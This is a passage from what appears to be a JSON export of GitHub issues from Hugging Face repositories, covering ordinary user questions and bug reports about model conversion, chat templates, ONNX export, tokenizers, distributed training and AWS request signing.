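state_dict = ckpt.get("state_dict", ckpt) if isinstance(ckpt, dict) else ckpt.state_dict()

# safetensors requires contiguous tensors.
state_dict = {k: v.contiguous() for k, v in state_dict.items()}

save_file(state_dict, "model.safetensors")
```

If keys get renamed along the way, or the conversion starts from something other than a full state dict, buffers such as `bn.running_mean` can be dropped, which would match the error reported below.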
Candle's yolov8 example then reports the following error:\r\nError: cannot find tensor net.b.1.0.bn.running_mean", "url": "https://github.com/huggingface/candle/issues/1878", "state": "closed", "labels": [], "created_at": "2024-03-19T11:51:59Z", "updated_at": "2024-04-06T11:37:24Z", "user": "EHW-liao" }, { "repo": "huggingface/alignment-handbook", "number": 138, "title": "How to select which parts to backprop in SFT", "body": "![image](https://github.com/huggingface/alignment-handbook/assets/77482343/903dd930-18b3-4eec-9aba-1bc0248a5302)\r\nAs the picture shows, there are cases where some parts of the GPT's response should not be calculated in the backward pass. If I want to achieve this, what should I do? (Or could you add this in a new version?) ", "url": "https://github.com/huggingface/alignment-handbook/issues/138", "state": "open", "labels": [], "created_at": "2024-03-19T10:26:49Z", "updated_at": "2024-03-19T10:26:49Z", "user": "Fu-Dayuan" }, { "repo": "huggingface/gsplat.js", "number": 76, "title": "How to start rendering with a local file path?", "body": "Hi, thanks for your work! \r\n\r\nI am new to JS and want to ask how to start rendering given a local path. I really appreciate any help you can provide.", "url": "https://github.com/huggingface/gsplat.js/issues/76", "state": "open", "labels": [], "created_at": "2024-03-18T07:13:31Z", "updated_at": "2024-04-18T13:14:24Z", "user": "yifanlu0227" }, { "repo": "huggingface/accelerate", "number": 2560, "title": "[Multi-GPU training] How to specify the backend used in DDP training?", "body": "### System Info\n\n```Shell\n.....\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n......\n\n### Expected behavior\n\n\"image\"\r\n\r\nI encountered the above errors after my program had run for 7 hours on 4 A100s. I don't know the cause, but the information suggests accelerate uses GLOO as the DDP backend. How do I switch to NCCL? To the best of my knowledge, it's better than GLOO.", "url": "https://github.com/huggingface/accelerate/issues/2560", "state": "closed", "labels": [], "created_at": "2024-03-17T01:46:47Z", "updated_at": "2024-05-17T15:06:51Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/swift-transformers", "number": 72, "title": "How to use BertTokenizer?", "body": "What is the best way to use the BertTokenizer? 
It's not a public file, so I'm not sure what's the best way to use it.", "url": "https://github.com/huggingface/swift-transformers/issues/72", "state": "closed", "labels": [], "created_at": "2024-03-16T18:13:36Z", "updated_at": "2024-03-22T10:29:54Z", "user": "jonathan-goodrx" }, { "repo": "huggingface/chat-ui", "number": 934, "title": "What are the rules to create a chatPromptTemplate in .env.local?", "body": "We know that the chatPromptTemplate for google/gemma-7b-it in .env.local is:\r\n\r\n\"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n\r\nand its chat template is:\r\n\"chat_template\": \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{{ raise_exception('System role not supported') }}{% endif %}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if (message['role'] == 'assistant') %}{% set role = 'model' %}{% else %}{% set role = message['role'] %}{% endif %}{{ '' + role + '\\n' + message['content'] | trim + '\\n' }}{% endfor %}{% if add_generation_prompt %}{{'model\\n'}}{% endif %}\",\r\n\r\nThe question is:\r\nAre there any rules for creating the chatPromptTemplate for a model? Usually we have the chat template from the model, but when we need to use this model in chat-ui, we have to write a chatPromptTemplate.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/934", "state": "open", "labels": [ "question" ], "created_at": "2024-03-16T17:51:38Z", "updated_at": "2024-04-04T14:02:20Z", "user": "houghtonweihu" }, { "repo": "huggingface/chat-ui", "number": 933, "title": "Why is the chat template of google/gemma-7b-it invalid JSON in .env.local?", "body": "I used the chat template from google/gemma-7b-it in .env.local, shown below:\r\n\r\n\"chat_template\": \"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{{ raise_exception('System role not supported') }}{% endif %}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if (message['role'] == 'assistant') %}{% set role = 'model' %}{% else %}{% set role = message['role'] %}{% endif %}{{ '' + role + '\\n' + message['content'] | trim + '\\n' }}{% endfor %}{% if add_generation_prompt %}{{'model\\n'}}{% endif %}\",\r\n\r\nI got this error:\r\n [vite] Error when evaluating SSR module /src/lib/server/models.ts:\r\n|- SyntaxError: Unexpected token ''', \"'[\" is not valid JSON\r\n", "url": "https://github.com/huggingface/chat-ui/issues/933", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-15T20:34:11Z", "updated_at": "2024-03-18T13:24:55Z", "user": "houghtonweihu" }, { "repo": "huggingface/diffusers", "number": 7337, "title": "How to convert multiple pipeline files into a single SafeTensor file?", "body": "How to convert multiple pipeline files into a single SafeTensor file?\r\n\r\nFor example, from this address: https://huggingface.co/Vargol/sdxl-lightning-4-steps/tree/main\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline, EulerDiscreteScheduler\r\n\r\nbase = \"Vargol/sdxl-lightning-4-steps\"\r\n\r\npipe = StableDiffusionXLPipeline.from_pretrained(base, 
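# half-precision weights to cut memory roughly in half; .to(\"cuda\") below moves the pipeline to the GPU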
torch_dtype=torch.float16).to(\"cuda\")\r\n```\r\n\r\nHow can I convert `pipe` into a single SafeTensor file as a whole?\r\n\r\n\r\nJust like the file `sd_xl_base_1.0_0.9vae.safetensors`, which contains the components needed from `diffusers`.\r\n\r\n_Originally posted by @xddun in https://github.com/huggingface/diffusers/issues/5360#issuecomment-1998986263_\r\n ", "url": "https://github.com/huggingface/diffusers/issues/7337", "state": "closed", "labels": [], "created_at": "2024-03-15T05:49:01Z", "updated_at": "2024-03-15T06:51:24Z", "user": "xxddccaa" }, { "repo": "huggingface/transformers.js", "number": 648, "title": "`aggregation_strategy` in TokenClassificationPipeline", "body": "### Question\n\nHello, the original Transformers library has an aggregation_strategy parameter to control whether tokens corresponding to the same entity are grouped together in the predictions. But in the transformers.js version I haven't found this parameter. Is it possible to provide it? I want the prediction result to be the same as in the original version.", "url": "https://github.com/huggingface/transformers.js/issues/648", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-15T04:07:22Z", "updated_at": "2024-04-10T21:35:42Z", "user": "boat-p" }, { "repo": "huggingface/transformers.js", "number": 646, "title": "Library no longer maintained?", "body": "### Question\n\nA year has passed since this PR became ready for merge: [Support React Native #118](https://github.com/xenova/transformers.js/pull/118)\r\n\r\nShould we make our own fork of xenova/transformers.js?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/646", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-14T10:37:33Z", "updated_at": "2024-06-10T15:32:41Z", "user": "pax-k" }, { "repo": "huggingface/tokenizers", "number": 1469, "title": "How to load a tokenizer trained by sentencepiece or tiktoken", "body": "Hi, does this lib support loading pre-trained tokenizers trained by other libs, like `sentencepiece` and `tiktoken`? Many models on the HF hub store tokenizers in these formats.", "url": "https://github.com/huggingface/tokenizers/issues/1469", "state": "closed", "labels": [ "Stale", "planned" ], "created_at": "2024-03-13T10:22:00Z", "updated_at": "2024-04-30T10:15:32Z", "user": "jordane95" }, { "repo": "huggingface/transformers.js", "number": 644, "title": "Contribution question: what's next after running scripts.convert?", "body": "### Question\n\nHi @xenova, I am trying to figure out how to contribute. I am new to huggingface, just 2 months down the rabbit hole.\r\n\r\nI ran the command\r\n`python -m scripts.convert --quantize --model_id SeaLLMs/SeaLLM-7B-v2`\r\n\r\nHere is a list of the files I got in the `models/SeaLLMs/SeaLLM-7B-v2` folder:\r\n\r\n```\r\n_model_layers.0_self_attn_rotary_emb_Constant_5_attr__value\r\n_model_layers.0_self_attn_rotary_emb_Constant_attr__value\r\nconfig.json\r\ngeneration_config.json\r\nmodel.onnx\r\nmodel.onnx_data\r\nspecial_tokens_map.json\r\ntokenizer.json\r\ntokenizer.model\r\ntokenizer_config.json\r\n```\r\nDoes it work? \r\n\r\nWhat's next from here? Do I upload the models to huggingface?\r\n\r\nDo you have example commits or PRs I should take a look at? I have been scanning the model PRs but none of them mentioned what happens after you run `scripts/convert`\r\n\r\nI have seen some other issues mention the need for documentation. I know you don't have it yet. That's fine. 
That's why I am only asking for a hint or a little guidance.", "url": "https://github.com/huggingface/transformers.js/issues/644", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-13T08:51:37Z", "updated_at": "2024-04-11T02:33:04Z", "user": "pacozaa" }, { "repo": "huggingface/making-games-with-ai-course", "number": 11, "title": "[UPDATE] Typo in Unit 1, \"What is HF?\" section. The word \"Danse\" should be \"Dance\"", "body": "# What do you want to improve?\r\nThere is a typo in Unit 1, \"What is HF?\" section.\r\nThe word \"Danse\" should be \"Dance\"\r\n\r\n- Explain the typo/error or the part of the course you want to improve\r\n\r\nThere is a typo in Unit 1, \"What is HF?\" section.\r\nThe word \"Danse\" should be \"Dance\"\r\n\r\nThe English spelling doesn't seem to include the French spelling. \r\nhttps://www.dictionary.com/browse/dance\r\n\r\nI assume this will also come up in later places, but I haven't gotten that far yet. :)\r\n\r\n\r\n# Actual Issue:\r\nIn this image:\r\nhttps://huggingface.co/datasets/huggingface-ml-4-games-course/course-images/resolve/main/en/unit1/unity/models4.jpg\r\nwhich is used here:\r\nhttps://github.com/huggingface/making-games-with-ai-course/blob/main/units/en/unit1/what-is-hf.mdx\r\n\r\n\r\n# **Also, don't hesitate to open a Pull Request with the update**. This way you'll be a contributor of the project.\r\nSorry, I have no access to the problematic image's source", "url": "https://github.com/huggingface/making-games-with-ai-course/issues/11", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-03-12T17:12:20Z", "updated_at": "2024-04-18T07:18:12Z", "user": "PaulForest" }, { "repo": "huggingface/transformers.js", "number": 642, "title": "RangeError: offset is out of bounds #601", "body": "### Question\r\n\r\n```\r\nclass NsfwDetector {\r\n constructor() {\r\n this._threshold = 0.5;\r\n this._nsfwLabels = [\r\n 'FEMALE_BREAST_EXPOSED',\r\n 'FEMALE_GENITALIA_EXPOSED',\r\n 'BUTTOCKS_EXPOSED',\r\n 'ANUS_EXPOSED',\r\n 'MALE_GENITALIA_EXPOSED',\r\n 'BLOOD_SHED',\r\n 'VIOLENCE',\r\n 'GORE',\r\n 'PORNOGRAPHY',\r\n 'DRUGS',\r\n 'ALCOHOL',\r\n ];\r\n }\r\n\r\n async isNsfw(imageUrl) {\r\n let blobUrl = '';\r\n try {\r\n // Load and resize the image first\r\n blobUrl = await this._loadAndResizeImage(imageUrl);\r\n const classifier = await window.tensorflowPipeline('zero-shot-image-classification', 'Xenova/clip-vit-base-patch16');\r\n const output = await classifier(blobUrl, this._nsfwLabels);\r\n console.log(output);\r\n const nsfwDetected = output.some(result => result.score > this._threshold);\r\n return nsfwDetected;\r\n } catch (error) {\r\n console.error('Error during NSFW classification: ', error);\r\n throw error;\r\n } finally {\r\n if (blobUrl) {\r\n URL.revokeObjectURL(blobUrl); // Ensure blob URLs are revoked after use to free up memory\r\n }\r\n }\r\n }\r\n\r\n async _loadAndResizeImage(imageUrl) {\r\n const img = await this._loadImage(imageUrl);\r\n const offScreenCanvas = document.createElement('canvas');\r\n const ctx = offScreenCanvas.getContext('2d');\r\n offScreenCanvas.width = 224;\r\n offScreenCanvas.height = 224;\r\n \r\n ctx.drawImage(img, 0, 0, offScreenCanvas.width, offScreenCanvas.height);\r\n \r\n return new Promise((resolve, reject) => {\r\n offScreenCanvas.toBlob(blob => {\r\n if (!blob) {\r\n reject('Canvas to Blob conversion failed');\r\n return;\r\n }\r\n const blobUrl = URL.createObjectURL(blob);\r\n resolve(blobUrl);\r\n }, 'image/jpeg');\r\n });\r\n }\r\n\r\n async _loadImage(url) {\r\n 
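// Resolves with a decoded HTMLImageElement; crossOrigin = 'anonymous' keeps the canvas untainted so drawImage/toBlob stay usable.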
return new Promise((resolve, reject) => {\r\n const img = new Image();\r\n img.crossOrigin = 'anonymous';\r\n img.onload = () => resolve(img);\r\n img.onerror = () => reject(`Failed to load image: ${url}`);\r\n img.src = url;\r\n });\r\n }\r\n}\r\n\r\nwindow.NsfwDetector = NsfwDetector;\r\n\r\n```\r\n\r\nWhen used on a bunch of images, it fails with \"RangeError: offset is out of bounds\".\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/642", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-12T16:47:58Z", "updated_at": "2024-03-13T05:57:23Z", "user": "vijishmadhavan" }, { "repo": "huggingface/chat-ui", "number": 926, "title": "AWS credentials resolution for Sagemaker models", "body": "chat-ui is excellent, thanks for all your amazing work here!\r\n\r\nI have been experimenting with a model in Sagemaker and am having some issues with the model endpoint configuration. It currently requires credentials to be provided explicitly. This does work, but the ergonomics are not great for our use cases:\r\n- in development, my team uses AWS SSO and it would be great to use our session credentials and not need to update our MODELS environment variable manually every time our sessions refresh\r\n- in deployments, we would want to use an instance or task execution role to sign requests\r\n\r\nIn my investigation I found this area of code https://github.com/huggingface/chat-ui/blob/eb071be4c938b0a2cf2e89a152d68305d4714949/src/lib/server/endpoints/aws/endpointAws.ts#L22-L37, which uses the `aws4fetch` library that only supports signing with explicitly passed AWS credentials.\r\n\r\nI was able to update this area of code locally and support AWS credential resolution by switching this to use a different library [`aws-sigv4-fetch`](https://github.com/zirkelc/aws-sigv4-fetch) like so:\r\n\r\n```ts\r\ntry {\r\n\tcreateSignedFetcher = (await import(\"aws-sigv4-fetch\")).createSignedFetcher;\r\n} catch (e) {\r\n\tthrow new Error(\"Failed to import aws-sigv4-fetch\");\r\n}\r\n\r\nconst { url, accessKey, secretKey, sessionToken, model, region, service } =\r\n\tendpointAwsParametersSchema.parse(input);\r\n\r\nconst signedFetch = createSignedFetcher({\r\n\tservice,\r\n\tregion,\r\n\tcredentials:\r\n\t\taccessKey && secretKey\r\n\t\t\t? { accessKeyId: accessKey, secretAccessKey: secretKey, sessionToken }\r\n\t\t\t: undefined,\r\n});\r\n\r\n// Replace `aws.fetch` with `signedFetch` below when passing `fetch` to `textGenerationStream#options`\r\n```\r\n\r\nMy testing has found this supports passing credentials like today, or letting the AWS SDK resolve them through the default chain.\r\n\r\nWould you be open to a PR with this change? Or is there a different/better/more suitable way to accomplish AWS credential resolution here?\r\n", "url": "https://github.com/huggingface/chat-ui/issues/926", "state": "open", "labels": [], "created_at": "2024-03-12T16:24:57Z", "updated_at": "2024-03-13T10:30:52Z", "comments": 1, "user": "nason" }, { "repo": "huggingface/optimum", "number": 1754, "title": "How to tell whether the ONNXRuntime backend is Intel OpenVINO", "body": "According to the [wiki](https://onnxruntime.ai/docs/execution-providers/#summary-of-supported-execution-providers), OpenVINO is one of ONNXRuntime's execution providers.\r\n\r\nI am deploying a model on an Intel Xeon Gold server, which supports AVX512 and which is compatible with Intel OpenVINO. 
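(For reference, a quick check of what onnxruntime actually sees, sketched under the assumption that plain `onnxruntime` is importable; `model.onnx` is a placeholder path:)

```python
import onnxruntime as ort

# Execution providers compiled into the installed wheel: the default CPU
# wheel reports ['CPUExecutionProvider'], while the onnxruntime-openvino
# build also lists 'OpenVINOExecutionProvider'.
print(ort.get_available_providers())

# For a concrete session, the providers actually in use:
session = ort.InferenceSession("model.onnx")
print(session.get_providers())
```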
How could I tell if the accelerator is the default CPU or OpenVINO?\r\n\r\n```python\r\nfrom sentence_transformers import SentenceTransformer, models\r\nfrom optimum.onnxruntime import ORTModelForCustomTasks\r\nfrom transformers import AutoTokenizer\r\n\r\ncheckpoint = 'Geotrend/distilbert-base-zh-cased'\r\nsave_directory = 'onnx'  # output root; defined here so the snippet runs\r\n\r\nort_model = ORTModelForCustomTasks.from_pretrained(checkpoint, export=True)\r\ntokenizer = AutoTokenizer.from_pretrained(checkpoint)\r\n\r\nort_model.save_pretrained(save_directory + \"/\" + checkpoint)\r\ntokenizer.save_pretrained(save_directory + \"/\" + checkpoint)\r\n```\r\n```shell\r\nFramework not specified. Using pt to export to ONNX.\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\nUsing framework PyTorch: 2.1.2.post300\r\n```", "url": "https://github.com/huggingface/optimum/issues/1754", "state": "closed", "labels": [], "created_at": "2024-03-12T08:54:01Z", "updated_at": "2024-07-08T11:31:13Z", "user": "ghost" }, { "repo": "huggingface/alignment-handbook", "number": 134, "title": "Is there a way to freeze some layers of a model?", "body": "Can we follow the normal way of:\r\n\r\n```\r\nfor param in model.base_model.parameters():\r\n param.requires_grad = False\r\n```", "url": "https://github.com/huggingface/alignment-handbook/issues/134", "state": "open", "labels": [], "created_at": "2024-03-12T02:06:03Z", "updated_at": "2024-03-12T02:06:03Z", "comments": 0, "user": "shamanez" }, { "repo": "huggingface/diffusers", "number": 7283, "title": "How to load a LoRA trained with Stable Cascade?", "body": "I finished a LoRA training run based on Stable Cascade with OneTrainer, but I cannot find a way to load the LoRA in a diffusers pipeline. Any help is appreciated.", "url": "https://github.com/huggingface/diffusers/issues/7283", "state": "closed", "labels": [ "stale" ], "created_at": "2024-03-12T01:33:01Z", "updated_at": "2024-06-29T13:35:45Z", "user": "zengjie617789" }, { "repo": "huggingface/datasets", "number": 6729, "title": "Support zipfiles that span multiple disks?", "body": "See https://huggingface.co/datasets/PhilEO-community/PhilEO-downstream\r\n\r\nThe dataset viewer gives the following error:\r\n\r\n```\r\nError code: ConfigNamesError\r\nException: BadZipFile\r\nMessage: zipfiles that span multiple disks are not supported\r\nTraceback: Traceback (most recent call last):\r\n File \"/src/services/worker/src/worker/job_runners/dataset/config_names.py\", line 67, in compute_config_names_response\r\n get_dataset_config_names(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/inspect.py\", line 347, in get_dataset_config_names\r\n dataset_module = dataset_module_factory(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1871, in dataset_module_factory\r\n raise e1 from None\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1846, in dataset_module_factory\r\n return HubDatasetModuleFactoryWithoutScript(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 1240, in get_module\r\n module_name, default_builder_kwargs = infer_module_for_data_files(\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 584, in infer_module_for_data_files\r\n split_modules = {\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 585, in \r\n split: infer_module_for_data_files_list(data_files_list, download_config=download_config)\r\n File 
\"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 526, in infer_module_for_data_files_list\r\n return infer_module_for_data_files_list_in_archives(data_files_list, download_config=download_config)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/load.py\", line 554, in infer_module_for_data_files_list_in_archives\r\n for f in xglob(extracted, recursive=True, download_config=download_config)[\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/datasets/download/streaming_download_manager.py\", line 576, in xglob\r\n fs, *_ = fsspec.get_fs_token_paths(urlpath, storage_options=storage_options)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/core.py\", line 622, in get_fs_token_paths\r\n fs = filesystem(protocol, **inkwargs)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/registry.py\", line 290, in filesystem\r\n return cls(**storage_options)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/spec.py\", line 79, in __call__\r\n obj = super().__call__(*args, **kwargs)\r\n File \"/src/services/worker/.venv/lib/python3.9/site-packages/fsspec/implementations/zip.py\", line 57, in __init__\r\n self.zip = zipfile.ZipFile(\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 1266, in __init__\r\n self._RealGetContents()\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 1329, in _RealGetContents\r\n endrec = _EndRecData(fp)\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 286, in _EndRecData\r\n return _EndRecData64(fpin, -sizeEndCentDir, endrec)\r\n File \"/usr/local/lib/python3.9/zipfile.py\", line 232, in _EndRecData64\r\n raise BadZipFile(\"zipfiles that span multiple disks are not supported\")\r\n zipfile.BadZipFile: zipfiles that span multiple disks are not supported\r\n```\r\n\r\nThe files (https://huggingface.co/datasets/PhilEO-community/PhilEO-downstream/tree/main/data) are:\r\n\r\n\"Capture\r\n", "url": "https://github.com/huggingface/datasets/issues/6729", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2024-03-11T21:07:41Z", "updated_at": "2024-06-26T05:08:59Z", "user": "severo" }, { "repo": "huggingface/candle", "number": 1834, "title": "How to increase model performance?", "body": "Hello all,\r\n\r\nI have recently benchmarked completion token time, which is 30ms on an H100. However, with llama.cpp it is 10ms. Because [mistral.rs](https://github.com/EricLBuehler/mistral.rs) is built on Candle, it inherits this performance deficit. In #1680, @guoqingbao said that the Candle implementation is not suitable for batched computing because of naive CUDA kernels. What other areas could be optimized?", "url": "https://github.com/huggingface/candle/issues/1834", "state": "closed", "labels": [], "created_at": "2024-03-11T12:36:45Z", "updated_at": "2024-03-29T20:44:46Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 638, "title": "Using an EfficientNet Model - Looking for advice", "body": "### Question\n\nDiscovered this project from the recent Syntax podcast episode (which was excellent) - it got my mind racing with different possibilities. 
\r\n\r\nI got some of the example projects up and running without too much issue and naturally wanted to try something a little more outside the box, which of course has led me down some rabbit holes.\r\n\r\nI came across this huggingface model;\r\nhttps://huggingface.co/chriamue/bird-species-classifier\r\nand https://huggingface.co/dennisjooo/Birds-Classifier-EfficientNetB2\r\n\r\nGreat, file size is only like 32 mb... however just swapping in this model into the example code didn't work - something about efficientnet models not supported yet. Okay I'll just try to convert this model with the provided script. \r\n\r\nSimilar error about EfficientNet... Okay I will clone the repo, and retrain using a different architecture... Then looking at the training data https://www.kaggle.com/datasets/gpiosenka/100-bird-species, it seems like maybe it's meant for efficientnet?\r\n\r\nAlso digging into how the above huggingface projects were done, I realized they are fine-tunes of other image classification models... \r\n\r\nSo my questions is, can I fine tune an existing transformer js image classification model? such as https://huggingface.co/Xenova/convnext-tiny-224 or am I better off using the original https://huggingface.co/facebook/convnext-tiny-224 model and creating a fine tune from there, then converting it to onnx using the script? \r\n\r\nThanks for your help on this and for this awesome project. Really just looking for some direction. ", "url": "https://github.com/huggingface/transformers.js/issues/638", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-11T01:31:49Z", "updated_at": "2024-03-11T17:42:31Z", "user": "ozzyonfire" }, { "repo": "huggingface/text-generation-inference", "number": 1636, "title": "Need instructions for how to optimize for production serving (fast startup)", "body": "### Feature request\n\nI suggest better educating developers how to download and optimize the model at build time (in container or in a volume) so that the command `text-generation-launcher` serves as fast as possible.\n\n### Motivation\n\nBy default, when running TGI using Docker, the container downloads the model on the fly and spend a long time optimizing it.\r\nThe [quicktour](https://huggingface.co/docs/text-generation-inference/en/quicktour) recommends using a local volume, which is great, but this isn't really compatible with autoscaled cloud environments, where container startup as to be as fast as possible.\n\n### Your contribution\n\nAs I explore this area, I will share my findings in this issue.", "url": "https://github.com/huggingface/text-generation-inference/issues/1636", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-03-10T22:17:53Z", "updated_at": "2024-04-15T02:49:03Z", "user": "steren" }, { "repo": "huggingface/optimum", "number": 1752, "title": "Documentation for exporting openai/whisper-large-v3 to ONNX", "body": "### Feature request\r\n\r\nHello, I am exporting the [OpenAI Whisper-large0v3](https://huggingface.co/openai/whisper-large-v3) to ONNX and see it exports several files, most importantly in this case encoder (encoder_model.onnx & encoder_model.onnx.data) and decoder (decoder_model.onnx, decoder_model.onnx.data, decoder_with_past_model.onnx, decoder_with_past_model.onnx.data) files. 
I'd also like to be able to use as much as possible from the `pipe` with the new onnx files:\r\n\r\n```python\r\npipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model,\r\n tokenizer=processor.tokenizer,\r\n feature_extractor=processor.feature_extractor,\r\n max_new_tokens=128,\r\n chunk_length_s=30,\r\n batch_size=16,\r\n return_timestamps=True,\r\n torch_dtype=torch_dtype,\r\n device=device,\r\n)\r\n```\r\n\r\nIs there documentation that explains how to incorporate all these different things? I know transformer models are much different in this whole process, and I cannot find a clear A -> B process on how to export this model and perform tasks such as quantization, etc. I see I can do the following for the tokenizer with ONNX, but I'd like more insight about the rest I mentioned above (how to use the separate onnx files & how to reuse as much of the preexisting pipeline as possible). \r\n\r\n```python\r\nprocessor.tokenizer.save_pretrained(onnx_path)\r\n```\r\n\r\nI also see I can do:\r\n\r\n```python\r\nmodel = ORTModelForSpeechSeq2Seq.from_pretrained(\r\n model_id, export=True\r\n )\r\n```\r\n\r\nbut I cannot find documentation on how to specify where it is exported to, which seems like I am either missing something fairly simple or it is just not hyperlinked in the documentation.\r\n\r\n### Motivation\r\n\r\nI'd love to see further documentation on the entire export process for this highly popular model. Deployment is significantly slowed due to there not being an easy-to-find A -> B process for exporting the model and using the pipeline given in the vanilla model. \r\n\r\n### Your contribution\r\n\r\nI am able to provide additional information to make this process easier.", "url": "https://github.com/huggingface/optimum/issues/1752", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-03-10T05:24:36Z", "updated_at": "2024-10-09T09:18:27Z", "comments": 10, "user": "mmingo848" }, { "repo": "huggingface/transformers", "number": 29564, "title": "How to add new special tokens", "body": "### System Info\n\n- `transformers` version: 4.38.0\r\n- Platform: Linux-6.5.0-21-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.20.2\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: not installed\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.0 (False)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: yes and no\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nExecute the code below:\r\n\r\n```\r\nfrom transformers import AutoTokenizer, AutoModel\r\nimport torch\r\nimport os\r\nfrom datasets import load_dataset\r\n\r\ndataset = load_dataset(\"ftopal/huggingface-datasets-processed\")\r\n\r\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\r\n\r\n\r\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\r\n# device = torch.device(\"cpu\")\r\ncheckpoint = 'intfloat/multilingual-e5-base'\r\n\r\nmodel = AutoModel.from_pretrained(checkpoint)\r\ntokenizer = AutoTokenizer.from_pretrained(\r\n checkpoint, \r\n additional_special_tokens=['']\r\n)\r\nmodel.to(device)\r\n\r\nencoded_input = tokenizer(\r\n dataset['train'][0]['input_texts'], # A tensor with 2, 512 shape\r\n padding='max_length',\r\n max_length=tokenizer.model_max_length,\r\n truncation=True,\r\n return_tensors=\"pt\",\r\n)\r\n\r\nencoded_input_dict = {\r\n k: v.to(device) for k, v in encoded_input.items()\r\n}\r\n\r\nwith torch.no_grad():\r\n model_output = model(**encoded_input_dict)\r\n```\n\n### Expected behavior\n\nI expect this code to work; however, it results in very weird errors. More details on the error stack trace can be found here: https://github.com/pytorch/pytorch/issues/121493\r\n\r\nI found that if I remove the `additional_special_tokens` param, the code works. So that seems to be the problem. Another issue is that it is still not clear (after so many years) how to extend/add special tokens into the model. I went through the code base to find this parameter, but it seems not to work alone, and the whole stack trace isn't helpful at all.\r\n\r\nQuestions from my side:\r\n\r\n- What is the expected solution for this, and could we document this somewhere? I can't find this anywhere, or somehow I am not able to find it.\r\n- When setting this param is not enough, which seems to be the case, why are we not raising an error somewhere? ", "url": "https://github.com/huggingface/transformers/issues/29564", "state": "closed", "labels": [], "created_at": "2024-03-09T22:56:44Z", "updated_at": "2024-04-17T08:03:43Z", "user": "lordsoffallen" }, { "repo": "huggingface/datasets", "number": 6726, "title": "Profiling for HF Filesystem shows there are easy performance gains to be made", "body": "### Describe the bug\n\n# Let's make it faster\r\nFirst, some evidence...\r\n![image](https://github.com/huggingface/datasets/assets/159512661/a703a82c-43a0-426c-9d99-24c563d70965)\r\nFigure 1: CProfile for loading 3 files from cerebras/SlimPajama-627B train split, and 3 files from test split using streaming=True. X axis is 1106 seconds long.\r\n\r\nSee? It's pretty slow.\r\n\r\nWhat is resolve pattern doing?\r\n```\r\nresolve_pattern called with **/train/** and hf://datasets/cerebras/SlimPajama-627B@2d0accdd58c5d5511943ca1f5ff0e3eb5e293543\r\nresolve_pattern took 20.815081119537354 seconds\r\n```\r\nMakes sense. How to improve it?\r\n\r\n## Bigger project, biggest payoff\r\n\r\nDatabricks (and consequently, spark) store a compressed manifest file of the files contained in the remote filesystem.\r\nThen, you download one tiny file, decompress it, and all the operations are local instead of this shenanigans.\r\n\r\nIt seems pretty straightforward to make dataset uploads compute a manifest and upload it alongside their data.\r\n\r\nThis would make resolution time so fast that nobody would ever think 